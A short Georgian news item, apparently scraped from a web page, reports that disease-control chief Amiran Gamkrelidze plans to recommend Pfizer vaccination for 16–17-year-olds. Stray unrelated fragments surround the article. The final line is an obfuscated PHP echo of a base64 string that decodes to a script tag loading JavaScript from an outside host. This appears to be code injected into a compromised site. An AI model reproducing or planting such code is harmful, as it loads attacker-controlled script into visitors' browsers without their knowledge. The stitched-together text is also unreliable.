celsiusi
ავერსი საქკაბელი
ვაპირებთ სამეცნიერო საბჭოზე წარვსდგეთ რეკომენდაციით, რომ „ფაიზერით“ აცრაში 16-17 წლის მოზარდები ჩავრთოთ“, - ამის შესახებ დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ ჟურნალისტებთან საუბრისას განაცხადა.
 
როგორც გამყრელიძე აღნიშნავს, „ფაიზერის“ ასაკობრივი ჯგუფი შესაძლოა, სექტემბრიდან გაფართოვდეს.
 
„ვაპირებთ სამეცნიერო საბჭოზე წარვსდგეთ რეკომენდაციით, რომ „ფაიზერით“ აცრაში 16-17 წლის მოზარდები ჩავრთოთ, 2 ასაკობრივი ჯგუფი დაემატოს, ზოგადად ველოდებით შემოდგომისკენ. იცით, რომ რამდენიმე ქვეყანამ „ფაიზერით“ აცრები დაიწყო 12-15 წლის ასაკშიც. შტატებმა, კანადამ, ისრაელმა, ბრიტანეთმა, იტალიამ და რამდენიმე ქვეყანამ. იმედი მაქვს, რომ „ფაიზერის“ საკმარისი დოზები გვექნება“, - აღნიშნავს გამყრელიძე.
1272
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");